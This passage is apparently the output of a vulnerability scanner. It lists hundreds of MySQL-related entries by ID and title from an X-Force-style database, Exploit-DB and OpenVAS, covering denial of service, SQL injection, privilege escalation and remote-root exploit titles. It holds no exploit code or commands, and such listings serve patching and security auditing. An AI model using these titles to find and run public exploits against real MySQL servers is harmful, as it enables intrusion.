21617| [65543] MySQL Select Arbitrary data into a File
21618| [65529] MySQL Eventum full_name field cross-site scripting
21619| [65380] Oracle MySQL Eventum forgot_password.php cross-site scripting
21620| [65379] Oracle MySQL Eventum list.php cross-site scripting
21621| [65266] Accellion File Transfer Appliance MySQL default password
21622| [64878] MySQL Geometry denial of service
21623| [64877] MySQL EXPLAIN EXTENDED denial of service
21624| [64876] MySQL prepared statement denial of service
21625| [64845] MySQL extreme-value denial of service
21626| [64844] MySQL Gis_line_string::init_from_wkb denial of service
21627| [64843] MySQL user-variable denial of service
21628| [64842] MySQL view preparation denial of service
21629| [64841] MySQL prepared statement denial of service
21630| [64840] MySQL LONGBLOB denial of service
21631| [64839] MySQL invocations denial of service
21632| [64838] MySQL Gis_line_string::init_from_wkb denial of service
21633| [64689] MySQL dict0crea.c denial of service
21634| [64688] MySQL SET column denial of service
21635| [64687] MySQL BINLOG command denial of service
21636| [64686] MySQL InnoDB denial of service
21637| [64685] MySQL HANDLER interface denial of service
21638| [64684] MySQL Item_singlerow_subselect::store denial of service
21639| [64683] MySQL OK packet denial of service
21640| [63518] MySQL Query Browser GUI Tools information disclosure
21641| [63517] MySQL Administrator GUI Tools information disclosure
21642| [62272] MySQL PolyFromWKB() denial of service
21643| [62269] MySQL LIKE predicates denial of service
21644| [62268] MySQL joins denial of service
21645| [62267] MySQL GREATEST() or LEAST() denial of service
21646| [62266] MySQL GROUP_CONCAT() denial of service
21647| [62265] MySQL expression values denial of service
21648| [62264] MySQL temporary table denial of service
21649| [62263] MySQL LEAST() or GREATEST() denial of service
21650| [62262] MySQL replication privilege escalation
21651| [61739] MySQL WITH ROLLUP denial of service
21652| [61343] MySQL LOAD DATA INFILE denial of service
21653| [61342] MySQL EXPLAIN denial of service
21654| [61341] MySQL HANDLER denial of service
21655| [61340] MySQL BINLOG denial of service
21656| [61339] MySQL IN() or CASE denial of service
21657| [61338] MySQL SET denial of service
21658| [61337] MySQL DDL denial of service
21659| [61318] PHP mysqlnd_wireprotocol.c buffer overflow
21660| [61317] PHP php_mysqlnd_read_error_from_line buffer overflow
21661| [61316] PHP php_mysqlnd_auth_write buffer overflow
21662| [61274] MySQL TEMPORARY InnoDB denial of service
21663| [59905] MySQL ALTER DATABASE denial of service
21664| [59841] CMySQLite updateUser.php cross-site request forgery
21665| [59112] MySQL Enterprise Monitor unspecified cross-site request forgery
21666| [59075] PHP php_mysqlnd_auth_write() buffer overflow
21667| [59074] PHP php_mysqlnd_read_error_from_line() buffer overflow
21668| [59073] PHP php_mysqlnd_rset_header_read() buffer overflow
21669| [59072] PHP php_mysqlnd_ok_read() information disclosure
21670| [58842] MySQL DROP TABLE file deletion
21671| [58676] Template Shares MySQL information disclosure
21672| [58531] MySQL COM_FIELD_LIST buffer overflow
21673| [58530] MySQL packet denial of service
21674| [58529] MySQL COM_FIELD_LIST security bypass
21675| [58311] ClanSphere the captcha generator and MySQL driver SQL injection
21676| [57925] MySQL UNINSTALL PLUGIN security bypass
21677| [57006] Quicksilver Forums mysqldump information disclosure
21678| [56800] Employee Timeclock Software mysqldump information disclosure
21679| [56200] Flex MySQL Connector ActionScript SQL injection
21680| [55877] MySQL yaSSL buffer overflow
21681| [55622] kiddog_mysqldumper extension for TYPO3 information disclosure
21682| [55416] MySQL unspecified buffer overflow
21683| [55382] Ublog UblogMySQL.sql information disclosure
21684| [55251] PHP-MySQL-Quiz editquiz.php SQL injection
21685| [54597] MySQL sql_table.cc security bypass
21686| [54596] MySQL mysqld denial of service
21687| [54365] MySQL OpenSSL security bypass
21688| [54364] MySQL MyISAM table symlink
21689| [53950] The mysql-ocaml mysql_real_escape_string weak security
21690| [52978] Zmanda Recovery Manager for MySQL mysqlhotcopy privilege escalation
21691| [52977] Zmanda Recovery Manager for MySQL socket-server.pl command execution
21692| [52660] iScouter PHP Web Portal MySQL Password Retrieval
21693| [52220] aa33code mysql.inc information disclosure
21694| [52122] MySQL Connector/J unicode SQL injection
21695| [51614] MySQL dispatch_command() denial of service
21696| [51406] MySQL Connector/NET SSL spoofing
21697| [49202] MySQL UDF command execution
21698| [49050] MySQL XPath denial of service
21699| [48919] Cisco Application Networking Manager MySQL default account password
21700| [48163] libapache2-mod-auth-mysql module for Debian multibyte encoding SQL injection
21701| [47544] MySQL Calendar index.php SQL injection
21702| [47476] MySQL Calendar index.php nodstrumCalendarV2 security bypass
21703| [45649] MySQL MyISAM symlink security bypass
21704| [45648] MySQL MyISAM symlinks security bypass
21705| [45607] MySQL Quick Admin actions.php file include
21706| [45606] MySQL Quick Admin index.php file include
21707| [45590] MySQL command-line client cross-site scripting
21708| [45436] PromoteWeb MySQL go.php SQL injection
21709| [45042] MySQL empty bit-string literal denial of service
21710| [44662] mysql-lists unspecified cross-site scripting
21711| [42267] MySQL MyISAM security bypass
21712| [42211] GEDCOM_to_MySQL2 index.php, info.php and prenom.php cross-site scripting
21713| [42014] miniBB setup_mysql.php and setup_options.php SQL injection
21714| [40920] MySQL sql_select.cc denial of service
21715| [40734] MySQL Server BINLOG privilege escalation
21716| [40350] MySQL password information disclosure
21717| [39415] Debian GNU/Linux libdspam7-drv-mysql cron job password disclosure
21718| [39402] PHP LOCAL INFILE and MySQL extension security bypass
21719| [38999] aurora framework db_mysql.lib SQL injection
21720| [38990] MySQL federated engine denial of service
21721| [38989] MySQL DEFINER value privilege escalation
21722| [38988] MySQL DATA DIRECTORY and INDEX DIRECTORY privilege escalation
21723| [38964] MySQL RENAME TABLE symlink
21724| [38733] ManageEngine EventLog Analyzer MySQL default password
21725| [38284] MySQL ha_innodb.cc convert_search_mode_to_innobase() denial of service
21726| [38189] MySQL default root password
21727| [37235] Asterisk-Addons cdr_addon_mysql module SQL injection
21728| [37099] RHSA update for MySQL case sensistive database name privilege escalation not installed
21729| [36555] PHP MySQL extension multiple functions security bypass
21730| [35960] MySQL view privilege escalation
21731| [35959] MySQL CREATE TABLE LIKE information disclosure
21732| [35958] MySQL connection protocol denial of service
21733| [35291] MySQLDumper main.php security bypass
21734| [34811] MySQL udf_init and mysql_create_function command execution
21735| [34809] MySQL mysql_update privilege escalation
21736| [34349] MySQL ALTER information disclosure
21737| [34348] MySQL mysql_change_db privilege escalation
21738| [34347] MySQL RENAME TABLE weak security
21739| [34232] MySQL IF clause denial of service
21740| [33388] Advanced Website Creator (AWC) mysql_escape_string SQL injection
21741| [33285] Eve-Nuke mysql.php file include
21742| [32957] MySQL Commander dbopen.php file include
21743| [32933] cPanel load_language.php and mysqlconfig.php file include
21744| [32911] MySQL filesort function denial of service
21745| [32462] cPanel passwdmysql cross-site scripting
21746| [32288] RHSA-2006:0544 updates for mysql not installed
21747| [32266] MySQLNewsEngine affichearticles.php3 file include
21748| [31244] The Address Book MySQL export.php password information disclosure
21749| [31037] Php/Mysql Site Builder (PHPBuilder) htm2php.php directory traversal
21750| [30760] BTSaveMySql URL file disclosure
21751| [30191] StoryStream mysql.php and mysqli.php file include
21752| [30085] MySQL MS-DOS device name denial of service
21753| [30031] Agora MysqlfinderAdmin.php file include
21754| [29438] MySQLDumper mysqldumper_path/sql.php cross-site scripting
21755| [29179] paBugs class.mysql.php file include
21756| [29120] ZoomStats MySQL file include
21757| [28448] MySQL case sensitive database name privilege escalation
21758| [28442] MySQL GRANT EXECUTE privilege escalation
21759| [28387] FunkBoard admin/mysql_install.php and admin/pg_install.php unauthorized access
21760| [28202] MySQL multiupdate subselect query denial of service
21761| [28180] MySQL MERGE table security bypass
21762| [28176] PHP MySQL Banner Exchange lib.inc information disclosure
21763| [27995] Opsware Network Automation System MySQL plaintext password
21764| [27904] MySQL date_format() format string
21765| [27635] MySQL Instance Manager denial of service
21766| [27212] MySQL SELECT str_to_date denial of service
21767| [26875] MySQL ASCII escaping SQL injection
21768| [26420] Apple Mac OS X MySQL Manager blank password
21769| [26236] MySQL login packet information disclosure
21770| [26232] MySQL COM_TABLE_DUMP buffer overflow
21771| [26228] MySQL sql_parce.cc information disclosure
21772| [26042] MySQL running
21773| [25313] WoltLab Burning Board class_db_mysql.php cross-site scripting
21774| [24966] MySQL mysql_real_query logging bypass
21775| [24653] PAM-MySQL logging function denial of service
21776| [24652] PAM-MySQL authentication double free code execution
21777| [24567] PHP/MYSQL Timesheet index.php and changehrs.php SQL injection
21778| [24095] PHP ext/mysqli exception handling format string
21779| [23990] PHP mysql_connect() buffer overflow
21780| [23596] MySQL Auction search module could allow cross-site scripting
21781| [22642] RHSA-2005:334 updates for mysql not installed
21782| [21757] MySQL UDF library functions command execution
21783| [21756] MySQL LoadLibraryEx function denial of service
21784| [21738] MySQL UDF mysql_create_function function directory traversal
21785| [21737] MySQL user defined function buffer overflow
21786| [21640] MySQL Eventum multiple class SQL injection
21787| [21638] MySQL Eventum multiple scripts cross-site scripting
21788| [20984] xmysqladmin temporary file symlink
21789| [20656] MySQL mysql_install_db script symlink
21790| [20333] Plans MySQL password information disclosure
21791| [19659] MySQL CREATE TEMPORARY TABLE command creates insecure files
21792| [19658] MySQL udf_init function gain access
21793| [19576] auraCMS mysql_fetch_row function path disclosure
21794| [18922] MySQL mysqlaccess script symlink attack
21795| [18824] MySQL UDF root privileges
21796| [18464] mysql_auth unspecified vulnerability
21797| [18449] Sugar Sales plaintext MySQL password
21798| [17783] MySQL underscore allows elevated privileges
21799| [17768] MySQL MATCH ... AGAINST SQL statement denial of service
21800| [17667] MySQL UNION change denial of service
21801| [17666] MySQL ALTER TABLE RENAME bypass restriction
21802| [17493] MySQL libmysqlclient bulk inserts buffer overflow
21803| [17462] MySQLGuest AWSguest.php script cross-site scripting
21804| [17047] MySQL mysql_real_connect buffer overflow
21805| [17030] MySQL mysqlhotcopy insecure temporary file
21806| [16612] MySQL my_rnd buffer overflow
21807| [16604] MySQL check_scramble_323 function allows unauthorized access
21808| [15883] MySQL mysqld_multi script symlink attack
21809| [15617] MySQL mysqlbug script symlink attack
21810| [15417] Confixx db_mysql_loeschen2.php SQL injection
21811| [15280] Proofpoint Protection Server MySQL allows unauthorized access
21812| [13404] HP Servicecontrol Manager multiple vulnerabilities in MySQL could allow execution of code
21813| [13153] MySQL long password buffer overflow
21814| [12689] MySQL AB ODBC Driver stores ODBC passwords and usernames in plain text
21815| [12540] Teapop PostSQL and MySQL modules SQL injection
21816| [12337] MySQL mysql_real_connect function buffer overflow
21817| [11510] MySQL datadir/my.cnf modification could allow root privileges
21818| [11493] mysqlcc configuration and connection files are world writable
21819| [11340] SuckBot mod_mysql_logger denial of service
21820| [11199] MySQL mysql_change_user() double-free memory pointer denial of service
21821| [10850] MySQL libmysql client read_one_row buffer overflow
21822| [10849] MySQL libmysql client read_rows buffer overflow
21823| [10848] MySQL COM_CHANGE_USER password buffer overflow
21824| [10847] MySQL COM_CHANGE_USER command password authentication bypass
21825| [10846] MySQL COM_TABLE_DUMP unsigned integer denial of service
21826| [10483] Bugzilla stores passwords in plain text in the MySQL database
21827| [10455] gBook MySQL could allow administrative access
21828| [10243] MySQL my.ini "
21829| [9996] MySQL SHOW GRANTS command discloses adminstrator`s encrypted password
21830| [9909] MySQL logging disabled by default on Windows
21831| [9908] MySQL binding to the loopback adapter is disabled
21832| [9902] MySQL default root password could allow unauthorized access
21833| [8748] Cyrus SASL LDAP+MySQL patch allows user unauthorized POP access
21834| [8105] PHP MySQL client library allows an attacker to bypass safe_mode restrictions
21835| [7923] Conectiva Linux MySQL /var/log/mysql file has insecure permissions
21836| [7206] WinMySQLadmin stores MySQL password in plain text
21837| [6617] MySQL "
21838| [6419] MySQL drop database command buffer overflow
21839| [6418] MySQL libmysqlclient.so buffer overflow
21840| [5969] MySQL select buffer overflow
21841| [5447] pam_mysql authentication input
21842| [5409] MySQL authentication algorithm obtain password hash
21843| [5057] PCCS MySQL Database Admin Tool could reveal username and password
21844| [4228] MySQL unauthenticated remote access
21845| [3849] MySQL default test account could allow any user to connect to the database
21846| [1568] MySQL creates readable log files
21847|
21848| Exploit-DB - https://www.exploit-db.com:
21849| [30744] MySQL <= 5.1.23 Server InnoDB CONVERT_SEARCH_MODE_TO_INNOBASE Function Denial Of Service Vulnerability
21850| [30677] Asterisk 'asterisk-addons' 1.2.7/1.4.3 CDR_ADDON_MYSQL Module SQL Injection Vulnerability
21851| [30020] MySQL 5.0.x - IF Query Handling Remote Denial of Service Vulnerability
21852| [29724] MySQL 5.0.x Single Row SubSelect Remote Denial of Service Vulnerability
21853| [29653] Active Calendar 1.2 data/mysqlevents.php css Parameter XSS
21854| [29572] CPanel <= 11 PassWDMySQL Cross-Site Scripting Vulnerability
21855| [29569] MySQLNewsEngine Affichearticles.PHP3 Remote File Include Vulnerability
21856| [28783] MySQLDumper 1.21 SQL.PHP Cross-Site Scripting Vulnerability
21857| [28398] MySQL 4/5 SUID Routine Miscalculation Arbitrary DML Statement Execution
21858| [28308] Banex PHP MySQL Banner Exchange 2.21 members.php cfg_root Parameter Remote File Inclusion
21859| [28307] Banex PHP MySQL Banner Exchange 2.21 admin.php Multiple Parameter SQL Injection
21860| [28306] Banex PHP MySQL Banner Exchange 2.21 signup.php site_name Parameter SQL Injection
21861| [28234] MySQL 4.x/5.x Server Date_Format Denial of Service Vulnerability
21862| [28026] MySQL Server 4/5 Str_To_Date Remote Denial of Service Vulnerability
21863| [27464] Cholod MySQL Based Message Board Mb.CGI SQL Injection Vulnerability
21864| [27444] Woltlab Burning Board 2.3.4 Class_DB_MySQL.PHP Cross-Site Scripting Vulnerability
21865| [27326] MySQL 5.0.18 Query Logging Bypass Vulnerability
21866| [26058] MySQL AB Eventum 1.x get_jsrs_data.php F Parameter XSS
21867| [26057] MySQL AB Eventum 1.x list.php release Parameter XSS
21868| [26056] MySQL AB Eventum 1.x view.php id Parameter XSS
21869| [25211] MySQL 4.x CREATE TEMPORARY TABLE Symlink Privilege Escalation
21870| [25210] MySQL 4.x CREATE FUNCTION mysql.func Table Arbitrary Library Injection
21871| [25209] MySQL 4.x CREATE FUNCTION Arbitrary libc Code Execution
21872| [24805] MySQL MaxDB 7.5 WAHTTP Server Remote Denial of Service Vulnerability
21873| [24669] MySQL 3.x/4.x ALTER TABLE/RENAME Forces Old Permission Checks
21874| [24250] MySQL 4.1/5.0 Authentication Bypass Vulnerability
21875| [23179] Oracle MySQL for Microsoft Windows MOF Execution
21876| [23138] MySQL 3.23.x/4.0.x Password Handler Buffer Overflow Vulnerability
21877| [23083] MySQL Windows Remote System Level Exploit (Stuxnet technique) 0day
21878| [23081] MySQL Remote Preauth User Enumeration Zeroday
21879| [23078] MySQL Denial of Service Zeroday PoC
21880| [23077] MySQL (Linux) Database Privilege Elevation Zeroday Exploit
21881| [23076] MySQL (Linux) Heap Based Overrun PoC Zeroday
21882| [23075] MySQL (Linux) Stack Based Buffer Overrun PoC Zeroday
21883| [23073] MySQL 5.1/5.5 WiNDOWS REMOTE R00T (mysqljackpot)
21884| [22946] MySQL AB ODBC Driver 3.51 Plain Text Password Vulnerability
21885| [22565] MySQL 3.x/4.0.x Weak Password Encryption Vulnerability
21886| [22340] MySQL 3.23.x mysqld Privilege Escalation Vulnerability
21887| [22085] MySQL 3.23.x/4.0.x COM_CHANGE_USER Password Memory Corruption Vulnerability
21888| [22084] MySQL 3.23.x/4.0.x COM_CHANGE_USER Password Length Account Compromise Vulnerability
21889| [21726] MySQL 3.20.32/3.22.x/3.23.x Null Root Password Weak Default Configuration Vulnerability (2)
21890| [21725] MySQL 3.20.32/3.22.x/3.23.x Null Root Password Weak Default Configuration Vulnerability (1)
21891| [21266] PHP 4.x/5.x MySQL Safe_Mode Filesystem Circumvention Vulnerability (3)
21892| [21265] PHP 4.x/5.x MySQL Safe_Mode Filesystem Circumvention Vulnerability (2)
21893| [21264] PHP 4.x/5.x MySQL Safe_Mode Filesystem Circumvention Vulnerability (1)
21894| [20718] MySQL 3.20.32 a/3.23.34 Root Operation Symbolic Link File Overwriting Vulnerability
21895| [20581] Mysql 3.22.x/3.23.x Local Buffer Overflow Vulnerability
21896| [20355] Plixer Scrutinizer NetFlow and sFlow Analyzer 9 Default MySQL Credential
21897| [20055] MySQL Squid Access Report 2.1.4 HTML Injection
21898| [20044] Symantec Web Gateway 5.0.3.18 Blind SQLi Backdoor via MySQL Triggers
21899| [19721] MySQL 3.22.27/3.22.29/3.23.8 GRANT Global Password Changing Vulnerability
21900| [19092] MySQL Remote Root Authentication Bypass
21901| [18269] MySQL 5.5.8 - Remote Denial of Service (DOS)
21902| [16957] Oracle MySQL for Microsoft Windows Payload Execution
21903| [16850] MySQL yaSSL CertDecoder::GetName Buffer Overflow
21904| [16849] MySQL yaSSL SSL Hello Message Buffer Overflow
21905| [16701] MySQL yaSSL SSL Hello Message Buffer Overflow
21906| [15467] Oracle MySQL < 5.1.49 'WITH ROLLUP' Denial of Service Vulnerability
21907| [14654] CMSQLite <= 1.2 & CMySQLite <= 1.3.1 - Remote Code Execution Exploit
21908| [14537] Oracle MySQL 'ALTER DATABASE' Remote Denial of Service Vulnerability
21909| [14096] CMSQlite & CMySQLite CSRF Vulnerability
21910| [10876] PHP-MySQL-Quiz SQL Injection Vulnerability
21911| [10450] Linkster PHP/MySQL SQL Injection Vulnerability
21912| [10260] Robert Zimmerman PHP / MYSQL Scripts Admin Bypass
21913| [9953] MySQL <= 6.0 yaSSL <= 1.7.5 Hello Message Buffer Overflow
21914| [9085] MySQL <= 5.0.45 COM_CREATE_DB Format String PoC (auth)
21915| [8037] ProFTPd with mod_mysql Authentication Bypass Vulnerability
21916| [7856] MySQL 4/5/6 UDF for Command Execution
21917| [7020] MySQL Quick Admin 1.5.5 - Local File Inclusion Vulnerability
21918| [6641] MySQL Quick Admin <= 1.5.5 (COOKIE) Local File Inclusion Vulnerability
21919| [6577] PromoteWeb MySQL (go.php id) Remote SQL Injection Vulnerability
21920| [6136] phpWebNews 0.2 MySQL Edition (SQL) Insecure Cookie Handling Vuln
21921| [5999] phpWebNews 0.2 MySQL Edition (det) SQL Injection Vulnerability
21922| [5998] phpWebNews 0.2 MySQL Edition (id_kat) SQL Injection Vulnerability
21923| [5913] MyBlog: PHP and MySQL Blog/CMS software (SQL/XSS) Vulnerabilities
21924| [4615] MySQL <= 5.0.45 (Alter) Denial of Service Vulnerability
21925| [4392] PHP <= 4.4.7 / 5.2.3 MySQL/MySQLi Safe Mode Bypass Vulnerability
21926| [3685] MyBlog: PHP and MySQL Blog/CMS software RFI Vulnerability
21927| [3591] PHP-Nuke Module Eve-Nuke 0.1 (mysql.php) RFI Vulnerability
21928| [3468] MySQL Commander <= 2.7 (home) Remote File Inclusion Vulnerability
21929| [3450] NukeSentinel <= 2.5.06 (MySQL => 4.0.24) - Remote SQL Injection Exploit
21930| [3344] PHP-Nuke <= 8.0 Final (INSERT) Blind SQL Injection Exploit (mysql)
21931| [3274] MySQL 4.x/5.0 User-Defined Function Command Execution Exploit (win)
21932| [2969] Php/Mysql Site Builder 0.0.2 (htm2php.php) File Disclosure Vulnerability
21933| [2726] Agora 1.4 RC1 (MysqlfinderAdmin.php) Remote File Include Vulnerability
21934| [2554] cPanel <= 10.8.x (cpwrap via mysqladmin) Local Root Exploit (php)
21935| [2466] cPanel <= 10.8.x (cpwrap via mysqladmin) Local Root Exploit
21936| [2437] paBugs <= 2.0 Beta 3 (class.mysql.php) Remote File Include Exploit
21937| [2420] ZoomStats <= 1.0.2 (mysql.php) Remote File Include Vulnerability
21938| [1742] MySQL (<= 4.1.18, 5.0.20) Local/Remote Information Leakage Exploit
21939| [1741] MySQL <= 5.0.20 COM_TABLE_DUMP Memory Leak/Remote BoF Exploit
21940| [1518] MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit
21941| [1406] PHP <= 4.4.0 (mysql_connect function) Local Buffer Overflow Exploit
21942| [1181] MySQL 4.0.17 UDF Dynamic Library Exploit
21943| [1134] MySQL Eventum <= 1.5.5 (login.php) SQL Injection Exploit
21944| [960] MySQL MaxDB Webtool <= 7.5.00.23 Remote Stack Overflow Exploit
21945| [311] MySQL 4.1/5.0 zero-length password Auth. Bypass Exploit
21946| [98] MySQL 3.23.x/4.0.x Remote Exploit
21947|
21948| OpenVAS (Nessus) - http://www.openvas.org:
21949| [902675] MySQLDumper Multiple Vulnerabilities
21950| [881549] CentOS Update for mysql CESA-2012:1551 centos6
21951| [881538] CentOS Update for mysql CESA-2012:1462 centos6
21952| [881225] CentOS Update for mysql CESA-2012:0105 centos6
21953| [881185] CentOS Update for mysql CESA-2012:0127 centos5
21954| [881061] CentOS Update for mysql CESA-2012:0874 centos6
21955| [880760] CentOS Update for mysql CESA-2009:1289 centos5 i386
21956| [880613] CentOS Update for mysql CESA-2010:0109 centos5 i386
21957| [880577] CentOS Update for mysql CESA-2010:0442 centos5 i386
21958| [880452] CentOS Update for mysql CESA-2010:0824 centos4 i386
21959| [880366] CentOS Update for mysql CESA-2010:0110 centos4 i386
21960| [880329] CentOS Update for mysql CESA-2007:1155 centos4 x86_64
21961| [880324] CentOS Update for mysql CESA-2007:1155 centos4 i386
21962| [870870] RedHat Update for mysql RHSA-2012:1551-01
21963| [870861] RedHat Update for mysql RHSA-2012:1462-01
21964| [870778] RedHat Update for mysql RHSA-2012:0874-04
21965| [870736] RedHat Update for mysql RHSA-2011:0164-01
21966| [870647] RedHat Update for mysql RHSA-2012:0105-01
21967| [870547] RedHat Update for mysql RHSA-2012:0127-01
21968| [870357] RedHat Update for mysql RHSA-2010:0824-01
21969| [870356] RedHat Update for mysql RHSA-2010:0825-01
21970| [870272] RedHat Update for mysql RHSA-2010:0442-01
21971| [870218] RedHat Update for mysql RHSA-2010:0110-01
21972| [870216] RedHat Update for mysql RHSA-2010:0109-01
21973| [870195] RedHat Update for mysql RHSA-2007:1155-01
21974| [870069] RedHat Update for mysql RHSA-2008:0364-01
21975| [870033] RedHat Update for mysql RHSA-2008:0768-01
21976| [864951] Fedora Update for mysql FEDORA-2012-19823
21977| [864945] Fedora Update for mysql FEDORA-2012-19833
21978| [864504] Fedora Update for mysql FEDORA-2012-9324
21979| [864474] Fedora Update for mysql FEDORA-2012-9308
21980| [863910] Fedora Update for mysql FEDORA-2012-0972
21981| [863725] Fedora Update for mysql FEDORA-2012-0987
21982| [862844] Fedora Update for mod_auth_mysql FEDORA-2011-0100
21983| [862840] Fedora Update for mod_auth_mysql FEDORA-2011-0114
21984| [862676] Fedora Update for mysql FEDORA-2010-15147
21985| [862444] Fedora Update for mysql FEDORA-2010-15166
21986| [862300] Fedora Update for mysql FEDORA-2010-11126
21987| [862290] Fedora Update for mysql FEDORA-2010-11135
21988| [862149] Fedora Update for mysql FEDORA-2010-9053
21989| [862148] Fedora Update for mysql FEDORA-2010-9061
21990| [862136] Fedora Update for mysql FEDORA-2010-9016
21991| [861948] Fedora Update for mysql FEDORA-2010-7355
21992| [861936] Fedora Update for mysql FEDORA-2010-7414
21993| [861707] Fedora Update for mysql FEDORA-2010-1300
21994| [861651] Fedora Update for mysql FEDORA-2010-1348
21995| [861544] Fedora Update for php-pear-MDB2-Driver-mysql FEDORA-2007-3369
21996| [861392] Fedora Update for mysql FEDORA-2007-4471
21997| [861180] Fedora Update for php-pear-MDB2-Driver-mysqli FEDORA-2007-3369
21998| [861162] Fedora Update for php-pear-MDB2-Driver-mysql FEDORA-2007-3376
21999| [861108] Fedora Update for php-pear-MDB2-Driver-mysqli FEDORA-2007-3376
22000| [861033] Fedora Update for mysql FEDORA-2007-4465
22001| [855481] Solaris Update for mysql 120292-02
22002| [855333] Solaris Update for mysql 120293-02
22003| [850182] SuSE Update for mysql openSUSE-SU-2012:0860-1 (mysql)
22004| [841248] Ubuntu Update for mysql-5.5 USN-1658-1
22005| [841207] Ubuntu Update for mysql-5.5 USN-1621-1
22006| [841039] Ubuntu Update for mysql-5.5 USN-1467-1
22007| [840989] Ubuntu Update for mysql-5.1 USN-1427-1
22008| [840944] Ubuntu Update for mysql-5.1 USN-1397-1
22009| [840533] Ubuntu Update for MySQL vulnerabilities USN-1017-1
22010| [840442] Ubuntu Update for MySQL vulnerabilities USN-950-1
22011| [840384] Ubuntu Update for MySQL vulnerabilities USN-897-1
22012| [840292] Ubuntu Update for mysql-dfsg-5.0 vulnerabilities USN-671-1
22013| [840240] Ubuntu Update for mysql-dfsg-5.0 regression USN-588-2
22014| [840219] Ubuntu Update for mysql-dfsg-5.0 vulnerabilities USN-588-1
22015| [840106] Ubuntu Update for mysql-dfsg-5.0 vulnerabilities USN-559-1
22016| [840042] Ubuntu Update for mysql-dfsg-5.0 vulnerabilities USN-528-1
22017| [840012] Ubuntu Update for mysql-dfsg-5.0 vulnerability USN-440-1
22018| [835096] HP-UX Update for on HP 9000 Servers Running MySQL HPSBUX00287
22019| [831755] Mandriva Update for mysql MDVSA-2012:178 (mysql)
22020| [831684] Mandriva Update for mysql MDVA-2012:049 (mysql)
22021| [831547] Mandriva Update for mysql MDVA-2012:022 (mysql)
22022| [831532] Mandriva Update for mysql MDVA-2012:005 (mysql)
22023| [831519] Mandriva Update for mysql MDVA-2011:099 (mysql)
22024| [831425] Mandriva Update for mysql MDVA-2011:025 (mysql)
22025| [831327] Mandriva Update for mysql MDVA-2011:005 (mysql)
22026| [831315] Mandriva Update for mysql MDVSA-2011:012 (mysql)
22027| [831295] Mandriva Update for mysql MDVA-2010:240 (mysql)
22028| [831244] Mandriva Update for mysql MDVSA-2010:155-1 (mysql)
22029| [831243] Mandriva Update for mysql MDVSA-2010:222 (mysql)
22030| [831237] Mandriva Update for mysql MDVSA-2010:223 (mysql)
22031| [831202] Mandriva Update for mysql MDVA-2010:210 (mysql)
22032| [831134] Mandriva Update for mysql MDVSA-2010:155 (mysql)
22033| [831049] Mandriva Update for mysql MDVSA-2010:107 (mysql)
22034| [831048] Mandriva Update for mysql MDVSA-2010:101 (mysql)
22035| [831034] Mandriva Update for mysql MDVA-2010:146 (mysql)
22036| [831033] Mandriva Update for mysql MDVSA-2010:093 (mysql)
22037| [830902] Mandriva Update for mysql MDVSA-2010:044 (mysql)
22038| [830821] Mandriva Update for mysql MDVSA-2010:011 (mysql)
22039| [830806] Mandriva Update for mysql MDVSA-2010:012 (mysql)
22040| [830772] Mandriva Update for mysql MDVSA-2008:150 (mysql)
22041| [830664] Mandriva Update for mysql MDVA-2008:018 (mysql)
22042| [830659] Mandriva Update for mysql MDVSA-2008:017 (mysql)
22043| [830513] Mandriva Update for mysql MDVSA-2008:028 (mysql)
22044| [830421] Mandriva Update for mysql MDVSA-2008:149 (mysql)
22045| [830297] Mandriva Update for MySQL MDKSA-2007:177 (MySQL)
22046| [830223] Mandriva Update for perl-DBD-mysql MDKA-2007:066 (perl-DBD-mysql)
22047| [830063] Mandriva Update for MySQL MDKSA-2007:139 (MySQL)
22048| [830032] Mandriva Update for MySQL MDKSA-2007:243 (MySQL)
22049| [801593] Oracle MySQL Eventum Multiple Cross Site Scripting Vulnerabilities
22050| [801205] MySQL Connector/Net SSL Certificate Validation Security Bypass Vulnerability
22051| [103051] PHP MySQLi Extension 'set_magic_quotes_runtime' Function Security-Bypass Weakness
22052| [100662] PHP Mysqlnd Extension Information Disclosure and Multiple Buffer Overflow Vulnerabilities
22053| [71475] Debian Security Advisory DSA 2496-1 (mysql-5.1)
22054| [71233] Debian Security Advisory DSA 2429-1 (mysql-5.1)
22055| [70803] Gentoo Security Advisory GLSA 201201-02 (MySQL)
22056| [70586] FreeBSD Ports: proftpd, proftpd-mysql
22057| [67541] Debian Security Advisory DSA 2057-1 (mysql-dfsg-5.0)
22058| [66577] Fedora Core 11 FEDORA-2009-13504 (mysql)
22059| [66573] Fedora Core 12 FEDORA-2009-13466 (mysql)
22060| [66553] Mandriva Security Advisory MDVSA-2009:189-1 (apache-mod_auth_mysql)
22061| [66508] Fedora Core 10 FEDORA-2009-12180 (mysql)
22062| [66425] Mandriva Security Advisory MDVSA-2009:326 (mysql)
22063| [66256] Fedora Core 11 FEDORA-2009-10701 (ocaml-mysql)
22064| [66251] Fedora Core 10 FEDORA-2009-10582 (ocaml-mysql)
22065| [66056] Debian Security Advisory DSA 1910-1 (mysql-ocaml)
22066| [66035] Mandrake Security Advisory MDVSA-2009:279 (ocaml-mysql)
22067| [65937] SLES10: Security update for MySQL
22068| [65884] SLES10: Security update for MySQL
22069| [65827] SLES10: Security update for MySQL
22070| [65710] SLES11: Security update for MySQL
22071| [65610] SLES9: Security update for MySQL
22072| [65566] SLES9: Security update for MySQL
22073| [65507] SLES9: Security update for MySQL
22074| [65502] SLES9: Security update for mysql
22075| [65426] SLES9: Security update for MySQL
22076| [65385] SLES9: Security update for mysql
22077| [65341] SLES9: Security update for MySQL
22078| [65181] SLES9: Security update for MySQL
22079| [65176] SLES9: Security update for MySQL
22080| [64932] CentOS Security Advisory CESA-2009:1289 (mysql)
22081| [64820] Debian Security Advisory DSA 1877-1 (mysql-dfsg-5.0)
22082| [64532] Mandrake Security Advisory MDVSA-2009:189 (apache-mod_auth_mysql)
22083| [64522] Mandrake Security Advisory MDVSA-2009:179 (mysql)
22084| [64461] Mandrake Security Advisory MDVSA-2009:159 (mysql)
22085| [63872] Mandrake Security Advisory MDVSA-2009:094 (mysql)
22086| [63630] FreeBSD Ports: proftpd, proftpd-mysql
22087| [63171] FreeBSD Ports: mysql-server
22088| [63170] FreeBSD Ports: mysql-server
22089| [63169] FreeBSD Ports: mysql-server
22090| [63168] FreeBSD Ports: mysql-server
22091| [63095] FreeBSD Ports: mysql-server
22092| [61852] Debian Security Advisory DSA 1662-1 (mysql-dfsg-5.0)
22093| [61699] FreeBSD Ports: mysql-client
22094| [61656] FreeBSD Ports: proftpd, proftpd-mysql
22095| [61618] FreeBSD Ports: mysql-server
22096| [61599] Gentoo Security Advisory GLSA 200809-04 (mysql)
